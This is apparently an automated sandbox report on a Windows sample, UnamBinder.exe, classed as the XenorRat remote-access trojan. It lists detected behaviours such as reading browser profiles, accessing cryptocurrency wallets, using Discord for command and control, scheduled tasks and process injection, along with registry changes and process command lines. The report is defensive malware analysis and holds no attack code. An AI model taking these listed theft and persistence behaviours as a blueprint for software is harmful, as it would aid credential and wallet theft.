Analysis Overview
SHA256
a90ba5a56422c0d2a41f28da056affd69cc8929e14dcdab1583ec96b50b8e28d
Threat Level: Known bad
The file UnamBinder.exe was found to be: Known bad.
Malicious Activity Summary
XenorRat
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
UPX packed file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Gathers system information
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Enumerates system info in registry
Enumerates processes with tasklist
Detects videocard installed
Kills process with taskkill
Modifies registry class
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-02 21:00
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-02 21:00
Reported
2024-07-02 21:07
Platform
win10v2004-20240611-en
Max time kernel
301s
Max time network
303s
Command Line
Signatures
XenorRat
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\loader_fixed.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SteamUDPUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\XenoManager\SteamUDPUpdater.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133644277658842837" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e00310000000000e25854a8100054656d7000003a0009000400efbecb58e7ace25854a82e00000088e10100000001000000000000000000000000000000613f2101540065006d007000000014000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000e245e7cc47bcda0127f9e10855bcda014707baa8c3ccda0114000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5600310000000000cb58e7ac12004170704461746100400009000400efbecb58e7ace25854a82e00000074e101000000010000000000000000000000000000006518b4004100700070004400610074006100000016000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "4" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f80cb859f6720028040b29b5540cc05aab60000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "3" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7800310000000000cb58e7ac1100557365727300640009000400efbe874f7748e25854a82e000000c70500000000010000000000000000003a00000000001e67c20055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000200000001000000ffffffff | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe
"C:\Users\Admin\AppData\Local\Temp\UnamBinder.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffadfddab58,0x7ffadfddab68,0x7ffadfddab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1704 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2164 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3108 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3116 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4364 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3940 --field-trial-handle=1652,i,3121810319418618430,6168922978565998340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
